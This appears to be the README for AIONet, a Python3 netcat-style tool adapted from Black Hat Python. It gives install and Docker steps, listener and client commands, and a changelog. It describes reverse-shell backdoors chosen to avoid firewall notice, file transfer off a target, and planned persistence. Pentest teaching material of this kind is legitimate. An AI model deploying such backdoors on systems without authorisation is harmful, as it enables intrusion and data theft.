AIONet was built as a multipurpose tool to replace netcat. Written in Python3, AIONet offers features like reverse shell spawning, file upload and file download.
The idea for this tool was obtained from chapter 2 of Black Hat Python by Justin Seitz. This program aims to update BHP's tool to provide features like class-based structure, Python3 support and error checking. A detailed explanation of the differences between the two can be found at the end of this document.
- Python3 (>=3.6)
git clone https://github.com/aarole/aionet.git
cd aionet/
wget -O aionet.py https://raw.githubusercontent.com/aarole/aionet/master/aionet.py
An AIONet listener can be created by using an existing Docker image or by building your own.
docker pull aarole/aionet
git clone https://github.com/aarole/aionet.git
cd aionet/
docker build -t aarole/aionet .
docker run --rm -it -v /path/to/some/directory:/opt -p PORT:PORT aarole/aionet -l -p PORT
- /path/to/some/directory
- Directory (a) containing the files you may want to upload, or (b) to which you may want to download files
- Directory path should be on your Docker host
- PORT
- Port on which the listener will listen
- Use the same port in all three locations
On host: python3 aionet.py -p PORT -l
On remote machine: python3 aionet.py -t TARGET -p PORT
Options:
-t target, --target target IP address of the remote listener
-p port, --port port If used with -l, port where listener is to be created; else, port where remote listener exists
-l, --listen Create a listener on the port defined using -p
-h, --help show this help message and exit
- Program structure overhauled to allow for easy extension
- Created individual classes for the server (listener/host) and the client (target/remote machine)
- Updated program to use reverse backdoors
- Listener is created on the physical machine and remote target connects to it
- Opening a port on the host ensures that firewalls on the remote target do not raise red flags
- Replaced getopt with argparse
- Moved file manipulation (download and upload) to post-shell operations
- Used the base64 library to encode files during upload/download
- Base64 encoding allows for easy transfer of files (especially non-text [pdf, png, jpg] files)
- Used the os library to allow for usage of cd and rm commands
- Added error-checking during file upload/download using SHA256 hashes (provided by hashlib)
- Hash is sent from the source computer along with the message
- The destination hashes the file locally
- If the hashes match, the file is downloaded/uploaded; else, the file is deleted
- Added server-side logging
- If the shell is dropped, all commands run and their respective output is stored in a timestamped log file
- Add support for bind shells
- Add ability to establish persistence
- File download
Non-text files (png, jpg, pdf) cause errors when downloading themFiles are partially downloaded and a part of the base64 encoded file is printed- Fix: Switched from length-based recv to sentinel-based recv
- Exit condition
exit command is not handled properly on the server- Fix: Moved handle() call in Server class to outside the while loop
- Downloading files with full path
Supplying the absolute path to a file being downloaded could potentially cause conflict issues on the host- Fix: Added a line to replace "/" with "_" to allow the user to download files by providing an absolute path without encountering conflict issues and maintaining the full path string in the downloaded file for their reference